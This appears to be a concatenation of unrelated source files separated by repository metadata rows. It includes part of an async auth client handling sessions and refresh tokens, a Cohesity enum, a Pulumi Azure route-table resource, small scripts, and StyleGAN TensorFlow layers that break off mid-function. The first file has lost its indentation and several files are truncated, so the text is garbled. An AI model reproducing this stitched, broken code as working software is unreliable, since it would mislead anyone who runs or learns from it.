If an error occurs
"""
data = urlparse(url)
query = parse_qs(data.query)
error_description = query.get("error_description")
access_token = query.get("access_token")
expires_in = query.get("expires_in")
refresh_token = query.get("refresh_token")
token_type = query.get("token_type")
if error_description:
raise APIError(error_description[0], 400)
if not access_token or not access_token[0]:
raise APIError("No access_token detected.", 400)
if not refresh_token or not refresh_token[0]:
raise APIError("No refresh_token detected.", 400)
if not token_type or not token_type[0]:
raise APIError("No token_type detected.", 400)
if not expires_in or not expires_in[0]:
raise APIError("No expires_in detected.", 400)
try:
expires_at = round(time()) + int(expires_in[0])
except ValueError:
raise APIError("Invalid expires_in.", 400)
response = await self.api.get_user(jwt=access_token[0])
provider_token = query.get("provider_token")
session = Session(
access_token=access_token[0],
token_type=token_type[0],
user=response,
expires_in=int(expires_in[0]),
expires_at=expires_at,
refresh_token=refresh_token[0],
provider_token=provider_token[0] if provider_token else None,
)
if store_session:
await self._save_session(session=session)
recovery_mode = query.get("type")
self._notify_all_subscribers(event=AuthChangeEvent.SIGNED_IN)
if recovery_mode and recovery_mode[0] == "recovery":
self._notify_all_subscribers(event=AuthChangeEvent.PASSWORD_RECOVERY)
return session
async def sign_out(self) -> None:
"""Log the user out."""
access_token: Optional[str] = None
if self.current_session:
access_token = self.current_session.access_token
await self._remove_session()
self._notify_all_subscribers(event=AuthChangeEvent.SIGNED_OUT)
if access_token:
await self.api.sign_out(jwt=access_token)
def _unsubscribe(self, *, id: str) -> None:
"""Unsubscribe from a subscription."""
self.state_change_emitters.pop(id)
def on_auth_state_change(
self,
*,
callback: Callable[[AuthChangeEvent, Optional[Session]], None],
) -> Subscription:
"""Receive a notification every time an auth event happens.
Parameters
----------
callback : Callable[[AuthChangeEvent, Optional[Session]], None]
The callback to call when an auth event happens.
Returns
-------
subscription : Subscription
A subscription object which can be used to unsubscribe itself.
Raises
------
error : APIError
If an error occurs
"""
unique_id = uuid4()
subscription = Subscription(
id=unique_id,
callback=callback,
unsubscribe=partial(self._unsubscribe, id=unique_id.hex),
)
self.state_change_emitters[unique_id.hex] = subscription
return subscription
async def _handle_email_sign_in(
self,
*,
email: str,
password: str,
redirect_to: Optional[str],
) -> Session:
"""Sign in with email and password."""
response = await self.api.sign_in_with_email(
email=email,
password=password,
redirect_to=redirect_to,
)
await self._save_session(session=response)
self._notify_all_subscribers(event=AuthChangeEvent.SIGNED_IN)
return response
async def _handle_phone_sign_in(self, *, phone: str, password: str) -> Session:
"""Sign in with phone and password."""
response = await self.api.sign_in_with_phone(phone=phone, password=password)
await self._save_session(session=response)
self._notify_all_subscribers(event=AuthChangeEvent.SIGNED_IN)
return response
async def _handle_provider_sign_in(
self,
*,
provider: Provider,
redirect_to: Optional[str],
scopes: Optional[str],
) -> str:
"""Sign in with provider."""
return await self.api.get_url_for_provider(
provider=provider,
redirect_to=redirect_to,
scopes=scopes,
)
async def _recover_common(self) -> Optional[Tuple[Session, int, int]]:
"""Recover common logic"""
json = await self.local_storage.get_item(STORAGE_KEY)
if not json:
return
data = loads(json)
session_raw = data.get("session")
expires_at_raw = data.get("expires_at")
if (
expires_at_raw
and isinstance(expires_at_raw, int)
and session_raw
and isinstance(session_raw, dict)
):
session = Session.parse_obj(session_raw)
expires_at = int(expires_at_raw)
time_now = round(time())
return session, expires_at, time_now
async def _recover_session(self) -> None:
"""Attempts to get the session from LocalStorage"""
result = await self._recover_common()
if not result:
return
session, expires_at, time_now = result
if expires_at >= time_now:
await self._save_session(session=session)
self._notify_all_subscribers(event=AuthChangeEvent.SIGNED_IN)
async def _recover_and_refresh(self) -> None:
"""Recovers the session from LocalStorage and refreshes"""
result = await self._recover_common()
if not result:
return
session, expires_at, time_now = result
if expires_at < time_now and self.auto_refresh_token and session.refresh_token:
try:
await self._call_refresh_token(refresh_token=session.refresh_token)
except APIError:
await self._remove_session()
elif expires_at < time_now or not session or not session.user:
await self._remove_session()
else:
await self._save_session(session=session)
self._notify_all_subscribers(event=AuthChangeEvent.SIGNED_IN)
async def _call_refresh_token(
self, *, refresh_token: Optional[str] = None
) -> Session:
if refresh_token is None:
if self.current_session:
refresh_token = self.current_session.refresh_token
else:
raise ValueError("No current session and refresh_token not supplied.")
response = await self.api.refresh_access_token(
refresh_token=cast(str, refresh_token)
)
await self._save_session(session=response)
self._notify_all_subscribers(event=AuthChangeEvent.TOKEN_REFRESHED)
self._notify_all_subscribers(event=AuthChangeEvent.SIGNED_IN)
return response
def _notify_all_subscribers(self, *, event: AuthChangeEvent) -> None:
"""Notify all subscribers that auth event happened."""
for value in self.state_change_emitters.values():
value.callback(event, self.current_session)
async def _save_session(self, *, session: Session) -> None:
"""Save session to client."""
self.current_session = session
self.current_user = session.user
if session.expires_at:
time_now = round(time())
expire_in = session.expires_at - time_now
refresh_duration_before_expires = 60 if expire_in > 60 else 0.5
self._start_auto_refresh_token(
value=(expire_in - refresh_duration_before_expires) * 1000
)
if self.persist_session and session.expires_at:
await self._persist_session(session=session)
async def _persist_session(self, *, session: Session) -> None:
data = {"session": session.dict(), "expires_at": session.expires_at}
await self.local_storage.set_item(STORAGE_KEY, dumps(data, default=str))
async def _remove_session(self) -> None:
"""Remove the session."""
self.current_session = None
self.current_user = None
if self.refresh_token_timer:
self.refresh_token_timer.cancel()
await self.local_storage.remove_item(STORAGE_KEY)
def _start_auto_refresh_token(self, *, value: float) -> None:
if self.refresh_token_timer:
self.refresh_token_timer.cancel()
if value <= 0 or not self.auto_refresh_token:
return
self.refresh_token_timer = Timer(value, self._call_refresh_token)
self.refresh_token_timer.start()
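# ---------------------------------------------------------------------------
# Editor's note: the example below is NOT part of the original client module.
# It is a hedged usage sketch, assuming a GoTrue server is reachable at the
# hypothetical URL below and that the constructor accepts the keyword
# arguments suggested by the fragment above (url, headers, cookie_options).
# The credentials are placeholders, not values from the source.
async def _example_usage() -> None:
    async with AsyncGoTrueClient(url="http://localhost:9999") as client:
        # Restore any session persisted in local storage.
        await client.init_recover()
        # Listen for auth events (SIGNED_IN, SIGNED_OUT, TOKEN_REFRESHED, ...).
        subscription = client.on_auth_state_change(
            callback=lambda event, session: print(event, session)
        )
        # Create an account, then sign in with the same credentials.
        await client.sign_up(email="someone@example.com", password="s3cret-pass")
        await client.sign_in(email="someone@example.com", password="s3cret-pass")
        print(client.user(), client.session())
        subscription.unsubscribe()
        await client.sign_out()
if __name__ == "__main__":
    import asyncio
    asyncio.run(_example_usage())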
| 35 | 87 | 0.599598 |
4a1b6c748898149806d49f213bd08b5464c96407
| 146 |
py
|
Python
|
.history/AdvanceP/error_20200514081055.py
|
EvanthiosPapadopoulos/Python3
|
ab773fd458e365c1510f98ecac65965234c881e8
|
[
"MIT"
] | 1 |
2020-05-18T17:50:00.000Z
|
2020-05-18T17:50:00.000Z
|
Udemy/Complete_Python_Bootcamp/AdvanceP/error.py
|
EvanthiosPapadopoulos/Python3
|
ab773fd458e365c1510f98ecac65965234c881e8
|
[
"MIT"
] | null | null | null |
Udemy/Complete_Python_Bootcamp/AdvanceP/error.py
|
EvanthiosPapadopoulos/Python3
|
ab773fd458e365c1510f98ecac65965234c881e8
|
[
"MIT"
] | null | null | null |
'''
A very simple script
'''
def myfunc():
'''
simple
'''
first = 1
second = 2
print(first)
print(second)
myfunc()
| 9.125 | 20 | 0.493151 |
4a1b6d2b097bdda71e26cec231abed69fd5b61d7
| 1,415 |
py
|
Python
|
cohesity_management_sdk/models/status_dag_application_server_info_enum.py
|
nick6655/management-sdk-python
|
88e792cb83e5c24a22af495b220c145d0c45841d
|
[
"Apache-2.0"
] | 18 |
2019-09-24T17:35:53.000Z
|
2022-03-25T08:08:47.000Z
|
cohesity_management_sdk/models/status_dag_application_server_info_enum.py
|
nick6655/management-sdk-python
|
88e792cb83e5c24a22af495b220c145d0c45841d
|
[
"Apache-2.0"
] | 18 |
2019-03-29T19:32:29.000Z
|
2022-01-03T23:16:45.000Z
|
cohesity_management_sdk/models/status_dag_application_server_info_enum.py
|
nick6655/management-sdk-python
|
88e792cb83e5c24a22af495b220c145d0c45841d
|
[
"Apache-2.0"
] | 16 |
2019-02-27T06:54:12.000Z
|
2021-11-16T18:10:24.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2021 Cohesity Inc.
class StatusDagApplicationServerInfoEnum(object):
"""Implementation of the 'Status_DagApplicationServerInfo' enum.
Specifies the status of the registration of the Exchange Application
Server.
Specifies the status of registration of Exchange Application Server.
'kUnknown' indicates the status is not known.
    'kHealthy' indicates the status is healthy and the server is registered
    as an Exchange Server.
'kUnHealthy' indicates the exchange application is registered on the
physical server but it is unreachable now.
'kUnregistered' indicates the server is not registered as physical source.
'kUnreachable' indicates the server is not reachable from the cohesity
cluster or the cohesity protection server is not installed on the exchange
server.
'kDetached' indicates the server is removed from the ExchangeDAG.
Attributes:
KUNKNOWN: TODO: type description here.
KHEALTHY: TODO: type description here.
KUNHEALTHY: TODO: type description here.
KUNREGISTERED: TODO: type description here.
KUNREACHABLE: TODO: type description here.
KDETACHED: TODO: type description here.
"""
KUNKNOWN = 'kUnknown'
KHEALTHY = 'kHealthy'
KUNHEALTHY = 'kUnHealthy'
KUNREGISTERED = 'kUnregistered'
KUNREACHABLE = 'kUnreachable'
KDETACHED = 'kDetached'
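# Editor's note: the helper below is NOT part of the original SDK module. It is
# a hedged usage sketch that relies only on the string constants defined above;
# the helper name and its semantics are assumptions.
def _is_server_usable(status: str) -> bool:
    """Hypothetical helper: True when the Exchange server reports a healthy registration."""
    return status == StatusDagApplicationServerInfoEnum.KHEALTHY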
| 32.159091 | 78 | 0.722968 |
4a1b6dc2125076b4a876ebbf12e8de51ab7a786c
| 430 |
py
|
Python
|
djspace/bin/export.py
|
carthagecollege/django-djspace
|
0fd26cccecdfd644255b323664e69b856ec90838
|
[
"MIT"
] | null | null | null |
djspace/bin/export.py
|
carthagecollege/django-djspace
|
0fd26cccecdfd644255b323664e69b856ec90838
|
[
"MIT"
] | 10 |
2020-10-06T15:39:29.000Z
|
2022-02-19T15:07:12.000Z
|
djspace/bin/export.py
|
carthagecollege/django-djspace
|
0fd26cccecdfd644255b323664e69b856ec90838
|
[
"MIT"
] | null | null | null |
import django
django.setup()
from django.contrib.auth.models import User
users = User.objects.all().order_by("last_name")
for user in users:
try:
apps = user.profile.applications.all()
except:
apps = None
if apps:
for a in apps:
#if str(a) == "First Nations Rocket Competition":
if a.get_slug() == "first-nations-rocket-competition":
                print(a.__dict__)
| 23.888889 | 66 | 0.609302 |
4a1b6e4921b56db8912fdc771a559b63e29f6772
| 14,147 |
py
|
Python
|
sdk/python/pulumi_azure_native/network/v20200601/virtual_hub_route_table_v2.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20200601/virtual_hub_route_table_v2.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
sdk/python/pulumi_azure_native/network/v20200601/virtual_hub_route_table_v2.py
|
sebtelko/pulumi-azure-native
|
711ec021b5c73da05611c56c8a35adb0ce3244e4
|
[
"Apache-2.0"
] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
from ._inputs import *
__all__ = ['VirtualHubRouteTableV2Args', 'VirtualHubRouteTableV2']
@pulumi.input_type
class VirtualHubRouteTableV2Args:
def __init__(__self__, *,
resource_group_name: pulumi.Input[str],
virtual_hub_name: pulumi.Input[str],
attached_connections: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
route_table_name: Optional[pulumi.Input[str]] = None,
routes: Optional[pulumi.Input[Sequence[pulumi.Input['VirtualHubRouteV2Args']]]] = None):
"""
The set of arguments for constructing a VirtualHubRouteTableV2 resource.
:param pulumi.Input[str] resource_group_name: The resource group name of the VirtualHub.
:param pulumi.Input[str] virtual_hub_name: The name of the VirtualHub.
:param pulumi.Input[Sequence[pulumi.Input[str]]] attached_connections: List of all connections attached to this route table v2.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[str] name: The name of the resource that is unique within a resource group. This name can be used to access the resource.
:param pulumi.Input[str] route_table_name: The name of the VirtualHubRouteTableV2.
:param pulumi.Input[Sequence[pulumi.Input['VirtualHubRouteV2Args']]] routes: List of all routes.
"""
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "virtual_hub_name", virtual_hub_name)
if attached_connections is not None:
pulumi.set(__self__, "attached_connections", attached_connections)
if id is not None:
pulumi.set(__self__, "id", id)
if name is not None:
pulumi.set(__self__, "name", name)
if route_table_name is not None:
pulumi.set(__self__, "route_table_name", route_table_name)
if routes is not None:
pulumi.set(__self__, "routes", routes)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The resource group name of the VirtualHub.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="virtualHubName")
def virtual_hub_name(self) -> pulumi.Input[str]:
"""
The name of the VirtualHub.
"""
return pulumi.get(self, "virtual_hub_name")
@virtual_hub_name.setter
def virtual_hub_name(self, value: pulumi.Input[str]):
pulumi.set(self, "virtual_hub_name", value)
@property
@pulumi.getter(name="attachedConnections")
def attached_connections(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
List of all connections attached to this route table v2.
"""
return pulumi.get(self, "attached_connections")
@attached_connections.setter
def attached_connections(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "attached_connections", value)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[str]]:
"""
Resource ID.
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource that is unique within a resource group. This name can be used to access the resource.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="routeTableName")
def route_table_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the VirtualHubRouteTableV2.
"""
return pulumi.get(self, "route_table_name")
@route_table_name.setter
def route_table_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "route_table_name", value)
@property
@pulumi.getter
def routes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['VirtualHubRouteV2Args']]]]:
"""
List of all routes.
"""
return pulumi.get(self, "routes")
@routes.setter
def routes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['VirtualHubRouteV2Args']]]]):
pulumi.set(self, "routes", value)
class VirtualHubRouteTableV2(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
attached_connections: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
route_table_name: Optional[pulumi.Input[str]] = None,
routes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VirtualHubRouteV2Args']]]]] = None,
virtual_hub_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
VirtualHubRouteTableV2 Resource.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] attached_connections: List of all connections attached to this route table v2.
:param pulumi.Input[str] id: Resource ID.
:param pulumi.Input[str] name: The name of the resource that is unique within a resource group. This name can be used to access the resource.
:param pulumi.Input[str] resource_group_name: The resource group name of the VirtualHub.
:param pulumi.Input[str] route_table_name: The name of the VirtualHubRouteTableV2.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VirtualHubRouteV2Args']]]] routes: List of all routes.
:param pulumi.Input[str] virtual_hub_name: The name of the VirtualHub.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: VirtualHubRouteTableV2Args,
opts: Optional[pulumi.ResourceOptions] = None):
"""
VirtualHubRouteTableV2 Resource.
:param str resource_name: The name of the resource.
:param VirtualHubRouteTableV2Args args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(VirtualHubRouteTableV2Args, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
attached_connections: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
route_table_name: Optional[pulumi.Input[str]] = None,
routes: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['VirtualHubRouteV2Args']]]]] = None,
virtual_hub_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = VirtualHubRouteTableV2Args.__new__(VirtualHubRouteTableV2Args)
__props__.__dict__["attached_connections"] = attached_connections
__props__.__dict__["id"] = id
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["route_table_name"] = route_table_name
__props__.__dict__["routes"] = routes
if virtual_hub_name is None and not opts.urn:
raise TypeError("Missing required property 'virtual_hub_name'")
__props__.__dict__["virtual_hub_name"] = virtual_hub_name
__props__.__dict__["etag"] = None
__props__.__dict__["provisioning_state"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:network/v20200601:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-native:network:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-nextgen:network:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-native:network/v20190901:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-nextgen:network/v20190901:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-native:network/v20191101:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-nextgen:network/v20191101:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-native:network/v20191201:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-nextgen:network/v20191201:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-native:network/v20200301:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-nextgen:network/v20200301:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-native:network/v20200401:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-nextgen:network/v20200401:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-native:network/v20200501:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-nextgen:network/v20200501:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-native:network/v20200701:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-nextgen:network/v20200701:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-native:network/v20200801:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-nextgen:network/v20200801:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-native:network/v20201101:VirtualHubRouteTableV2"), pulumi.Alias(type_="azure-nextgen:network/v20201101:VirtualHubRouteTableV2")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(VirtualHubRouteTableV2, __self__).__init__(
'azure-native:network/v20200601:VirtualHubRouteTableV2',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'VirtualHubRouteTableV2':
"""
Get an existing VirtualHubRouteTableV2 resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = VirtualHubRouteTableV2Args.__new__(VirtualHubRouteTableV2Args)
__props__.__dict__["attached_connections"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["routes"] = None
return VirtualHubRouteTableV2(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="attachedConnections")
def attached_connections(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
List of all connections attached to this route table v2.
"""
return pulumi.get(self, "attached_connections")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def name(self) -> pulumi.Output[Optional[str]]:
"""
The name of the resource that is unique within a resource group. This name can be used to access the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the virtual hub route table v2 resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def routes(self) -> pulumi.Output[Optional[Sequence['outputs.VirtualHubRouteV2Response']]]:
"""
List of all routes.
"""
return pulumi.get(self, "routes")
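# ---------------------------------------------------------------------------
# Editor's note: hedged usage sketch, NOT part of the generated SDK module.
# Inside a Pulumi program one might create this resource roughly as follows;
# the resource group, hub name and route values are placeholders, and the
# exact module path for VirtualHubRouteV2Args is an assumption.
#
#   import pulumi_azure_native as azure_native
#
#   route_table = azure_native.network.v20200601.VirtualHubRouteTableV2(
#       "exampleRouteTable",
#       resource_group_name="example-rg",
#       virtual_hub_name="example-hub",
#       route_table_name="example-route-table",
#       routes=[
#           azure_native.network.v20200601.VirtualHubRouteV2Args(
#               destination_type="CIDR",
#               destinations=["10.0.0.0/16"],
#               next_hop_type="IPConfig",
#               next_hops=["10.1.0.5"],
#           )
#       ],
#   )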
| 49.465035 | 1,661 | 0.67456 |
4a1b6fb288e5039d358dc3cd2863b49de35ca387
| 199 |
py
|
Python
|
baekjoon/python/sum_of_numbers_11720.py
|
yskang/AlgorithmPracticeWithPython
|
f7129bd1924a7961489198f0ee052d2cd1e9cf40
|
[
"MIT"
] | null | null | null |
baekjoon/python/sum_of_numbers_11720.py
|
yskang/AlgorithmPracticeWithPython
|
f7129bd1924a7961489198f0ee052d2cd1e9cf40
|
[
"MIT"
] | null | null | null |
baekjoon/python/sum_of_numbers_11720.py
|
yskang/AlgorithmPracticeWithPython
|
f7129bd1924a7961489198f0ee052d2cd1e9cf40
|
[
"MIT"
] | null | null | null |
# https://www.acmicpc.net/problem/11720
import sys
from functools import reduce
N = int(sys.stdin.readline())
print(reduce(lambda i, j: i + j, map(int, sys.stdin.readline().replace("\n", ""))))
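# Editor's note (not part of the original solution): the reduce above is
# equivalent to the builtin sum for a non-empty digit string, e.g.
#   print(sum(map(int, sys.stdin.readline().strip())))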
| 33.166667 | 83 | 0.678392 |
4a1b6fbb10308cf4e8430336d2216a231a4ddc56
| 33,388 |
py
|
Python
|
converters/stylegan_official/training/networks_stylegan.py
|
ShenYujun/genforce
|
2ad04974cfaeba20b93c806531f987f06cc5c328
|
[
"MIT"
] | 827 |
2020-09-25T04:10:30.000Z
|
2022-03-23T20:20:35.000Z
|
converters/stylegan_official/training/networks_stylegan.py
|
ShenYujun/genforce
|
2ad04974cfaeba20b93c806531f987f06cc5c328
|
[
"MIT"
] | 31 |
2020-10-11T04:56:24.000Z
|
2022-02-23T15:51:30.000Z
|
converters/stylegan_official/training/networks_stylegan.py
|
ShenYujun/genforce
|
2ad04974cfaeba20b93c806531f987f06cc5c328
|
[
"MIT"
] | 68 |
2020-09-30T08:23:33.000Z
|
2022-03-12T06:33:38.000Z
|
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# This work is licensed under the Creative Commons Attribution-NonCommercial
# 4.0 International License. To view a copy of this license, visit
# http://creativecommons.org/licenses/by-nc/4.0/ or send a letter to
# Creative Commons, PO Box 1866, Mountain View, CA 94042, USA.
"""Network architectures used in the StyleGAN paper."""
import numpy as np
import tensorflow as tf
import dnnlib
import dnnlib.tflib as tflib
# NOTE: Do not import any application-specific modules here!
# Specify all network parameters as kwargs.
#----------------------------------------------------------------------------
# Primitive ops for manipulating 4D activation tensors.
# The gradients of these are not necessarily efficient or even meaningful.
def _blur2d(x, f=[1,2,1], normalize=True, flip=False, stride=1):
assert x.shape.ndims == 4 and all(dim.value is not None for dim in x.shape[1:])
assert isinstance(stride, int) and stride >= 1
# Finalize filter kernel.
f = np.array(f, dtype=np.float32)
if f.ndim == 1:
f = f[:, np.newaxis] * f[np.newaxis, :]
assert f.ndim == 2
if normalize:
f /= np.sum(f)
if flip:
f = f[::-1, ::-1]
f = f[:, :, np.newaxis, np.newaxis]
f = np.tile(f, [1, 1, int(x.shape[1]), 1])
# No-op => early exit.
if f.shape == (1, 1) and f[0,0] == 1:
return x
# Convolve using depthwise_conv2d.
orig_dtype = x.dtype
x = tf.cast(x, tf.float32) # tf.nn.depthwise_conv2d() doesn't support fp16
f = tf.constant(f, dtype=x.dtype, name='filter')
strides = [1, 1, stride, stride]
x = tf.nn.depthwise_conv2d(x, f, strides=strides, padding='SAME', data_format='NCHW')
x = tf.cast(x, orig_dtype)
return x
def _upscale2d(x, factor=2, gain=1):
assert x.shape.ndims == 4 and all(dim.value is not None for dim in x.shape[1:])
assert isinstance(factor, int) and factor >= 1
# Apply gain.
if gain != 1:
x *= gain
# No-op => early exit.
if factor == 1:
return x
# Upscale using tf.tile().
s = x.shape
x = tf.reshape(x, [-1, s[1], s[2], 1, s[3], 1])
x = tf.tile(x, [1, 1, 1, factor, 1, factor])
x = tf.reshape(x, [-1, s[1], s[2] * factor, s[3] * factor])
return x
def _downscale2d(x, factor=2, gain=1):
assert x.shape.ndims == 4 and all(dim.value is not None for dim in x.shape[1:])
assert isinstance(factor, int) and factor >= 1
# 2x2, float32 => downscale using _blur2d().
if factor == 2 and x.dtype == tf.float32:
f = [np.sqrt(gain) / factor] * factor
return _blur2d(x, f=f, normalize=False, stride=factor)
# Apply gain.
if gain != 1:
x *= gain
# No-op => early exit.
if factor == 1:
return x
# Large factor => downscale using tf.nn.avg_pool().
# NOTE: Requires tf_config['graph_options.place_pruned_graph']=True to work.
ksize = [1, 1, factor, factor]
return tf.nn.avg_pool(x, ksize=ksize, strides=ksize, padding='VALID', data_format='NCHW')
#----------------------------------------------------------------------------
# High-level ops for manipulating 4D activation tensors.
# The gradients of these are meant to be as efficient as possible.
def blur2d(x, f=[1,2,1], normalize=True):
with tf.variable_scope('Blur2D'):
@tf.custom_gradient
def func(x):
y = _blur2d(x, f, normalize)
@tf.custom_gradient
def grad(dy):
dx = _blur2d(dy, f, normalize, flip=True)
return dx, lambda ddx: _blur2d(ddx, f, normalize)
return y, grad
return func(x)
def upscale2d(x, factor=2):
with tf.variable_scope('Upscale2D'):
@tf.custom_gradient
def func(x):
y = _upscale2d(x, factor)
@tf.custom_gradient
def grad(dy):
dx = _downscale2d(dy, factor, gain=factor**2)
return dx, lambda ddx: _upscale2d(ddx, factor)
return y, grad
return func(x)
def downscale2d(x, factor=2):
with tf.variable_scope('Downscale2D'):
@tf.custom_gradient
def func(x):
y = _downscale2d(x, factor)
@tf.custom_gradient
def grad(dy):
dx = _upscale2d(dy, factor, gain=1/factor**2)
return dx, lambda ddx: _downscale2d(ddx, factor)
return y, grad
return func(x)
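# Editor's note (not in the original file): a hedged shape sketch for the three
# resampling ops above, assuming an NCHW float32 tensor:
#   x  = tf.zeros([8, 3, 16, 16])
#   y1 = blur2d(x)        # -> [8, 3, 16, 16], per-channel low-pass filtering
#   y2 = upscale2d(x)     # -> [8, 3, 32, 32], nearest-neighbour upsampling
#   y3 = downscale2d(x)   # -> [8, 3, 8, 8], blur-based 2x downsampling here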
#----------------------------------------------------------------------------
# Get/create weight tensor for a convolutional or fully-connected layer.
def get_weight(shape, gain=np.sqrt(2), use_wscale=False, lrmul=1):
fan_in = np.prod(shape[:-1]) # [kernel, kernel, fmaps_in, fmaps_out] or [in, out]
he_std = gain / np.sqrt(fan_in) # He init
# Equalized learning rate and custom learning rate multiplier.
if use_wscale:
init_std = 1.0 / lrmul
runtime_coef = he_std * lrmul
else:
init_std = he_std / lrmul
runtime_coef = lrmul
# Create variable.
init = tf.initializers.random_normal(0, init_std)
return tf.get_variable('weight', shape=shape, initializer=init) * runtime_coef
#----------------------------------------------------------------------------
# Fully-connected layer.
def dense(x, fmaps, **kwargs):
if len(x.shape) > 2:
x = tf.reshape(x, [-1, np.prod([d.value for d in x.shape[1:]])])
w = get_weight([x.shape[1].value, fmaps], **kwargs)
w = tf.cast(w, x.dtype)
return tf.matmul(x, w)
#----------------------------------------------------------------------------
# Convolutional layer.
def conv2d(x, fmaps, kernel, **kwargs):
assert kernel >= 1 and kernel % 2 == 1
w = get_weight([kernel, kernel, x.shape[1].value, fmaps], **kwargs)
w = tf.cast(w, x.dtype)
